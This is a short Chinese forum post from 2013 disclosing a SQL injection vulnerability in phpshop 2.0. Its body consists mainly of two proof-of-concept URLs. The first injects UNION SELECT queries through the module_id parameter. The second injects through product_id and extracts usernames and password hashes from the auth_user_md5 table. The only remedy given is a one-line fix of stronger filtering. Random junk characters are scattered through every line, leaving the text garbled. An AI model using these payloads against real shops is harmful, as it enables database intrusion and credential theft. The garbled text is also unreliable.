标题 : phpshop 2.0 SQL Injection Vulnerability# u0 m }4 I* k& t! K
: Q. X1 w) \. D2 d4 k* @4 S" {
作者 : By onestree+ @& q4 ]& |9 C% u
下载地址 : http://code.google.com/p/phpshop/downloads/list
) @. Q8 X8 Z+ f P8 D8 ?( b8 O3 ?7 F测试地址: windows 7 / ubuntu9 \7 U8 N& I! O k! C! D4 G
) R' I: u( w9 c, u% ?( s8 C/ {, B _7 m
i, U8 C# B/ Z1 ~
SQLi p0c:
- n! X, P$ Z! K4 K! F7 I7 y % p4 M% H9 \. {( E$ Z
==================9 i7 R2 w0 G; J5 w7 V& N
4 d4 u" ~' q9 Z( D; e6 g9 U( M
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
) c: b3 K& u* m: @; q0 P+ Iunion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
- m- \6 X Y/ d6 I
" z3 ^% B5 X& C! nhttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
: M; h. k! K m3 f# e0 X0 r, W2 ~2 @7 t; ~ s" ^, w( I; N
修复:5 b O/ P* ~) F& L6 U% N6 D
加强过滤6 Y w8 Q% D: V5 [
" W5 z* R! O, p7 }# K/ @
* e# A' t/ j. C P1 q
|
发表于 2013-1-18 18:24:10
收藏
支持
反对